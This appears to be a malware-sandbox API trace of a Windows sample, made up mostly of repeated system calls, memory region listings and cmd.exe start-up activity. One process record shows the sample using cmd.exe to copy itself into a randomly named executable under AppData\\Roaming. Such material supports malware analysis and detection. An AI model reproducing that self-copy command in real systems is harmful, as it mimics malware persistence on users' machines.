[0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] 
GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] CloseHandle (hObject=0x88) returned 1 [0093.970] CloseHandle (hObject=0x8c) returned 1 [0093.970] CloseHandle (hObject=0x84) returned 1 [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, 
wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime 
(in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.971] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.973] FreeLibrary (hLibModule=0x76910000) returned 1 [0093.973] LocalFree (hMem=0x304410) returned 0x0 [0093.973] FreeLibrary (hLibModule=0x76910000) returned 1 [0093.973] LocalFree (hMem=0x304400) returned 0x0 [0093.973] ExitProcess (uExitCode=0x0) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 
"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 215 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 218 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 219 start_va = 0x4a7b0000 end_va = 0x4a7fbfff entry_point = 0x4a7b0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 220 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 221 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 223 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" 
filename = "" Region: id = 225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 226 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 227 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 228 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 229 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 230 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 231 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 232 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 233 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 234 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 235 start_va = 
0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 236 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 237 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 238 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 239 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 240 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 241 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 242 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 243 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 244 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 245 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename 
= "" Region: id = 246 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 247 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 248 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 3 os_tid = 0xa94 [0092.686] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff34 | out: lpSystemTimeAsFileTime=0x14ff34*(dwLowDateTime=0x76267ec0, dwHighDateTime=0x1d440a9)) [0092.686] GetCurrentProcessId () returned 0xa90 [0092.686] GetCurrentThreadId () returned 0xa94 [0092.686] GetTickCount () returned 0x2278c [0092.686] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff2c | out: lpPerformanceCount=0x14ff2c*=14947533899) returned 1 [0092.687] GetModuleHandleA (lpModuleName=0x0) returned 0x4a7b0000 [0092.687] __set_app_type (_Type=0x1) [0092.687] __p__fmode () returned 0x76b331f4 [0092.687] __p__commode () returned 0x76b331fc [0092.687] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7d21a6) returned 0x0 [0092.687] __getmainargs (in: _Argc=0x4a7d4238, _Argv=0x4a7d4240, _Env=0x4a7d423c, _DoWildCard=0, _StartInfo=0x4a7d4140 | out: _Argc=0x4a7d4238, _Argv=0x4a7d4240, _Env=0x4a7d423c) returned 0 [0092.687] GetCurrentThreadId () returned 0xa94 [0092.687] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0092.687] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.687] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0092.687] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.688] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.688] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fec4 | out: phkResult=0x14fec4*=0x0) returned 0x2 [0092.688] VirtualQuery (in: lpAddress=0x14fefb, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.688] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fe94, dwLength=0x1c | out: lpBuffer=0x14fe94*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0092.688] GetConsoleOutputCP () returned 0x1b5 [0092.688] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7d4260 | out: lpCPInfo=0x4a7d4260) returned 1 [0092.688] SetConsoleCtrlHandler (HandlerRoutine=0x4a7ce72a, Add=1) returned 1 [0092.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.688] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0092.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.688] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7d41ac | out: lpMode=0x4a7d41ac) returned 1 [0092.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.689] 
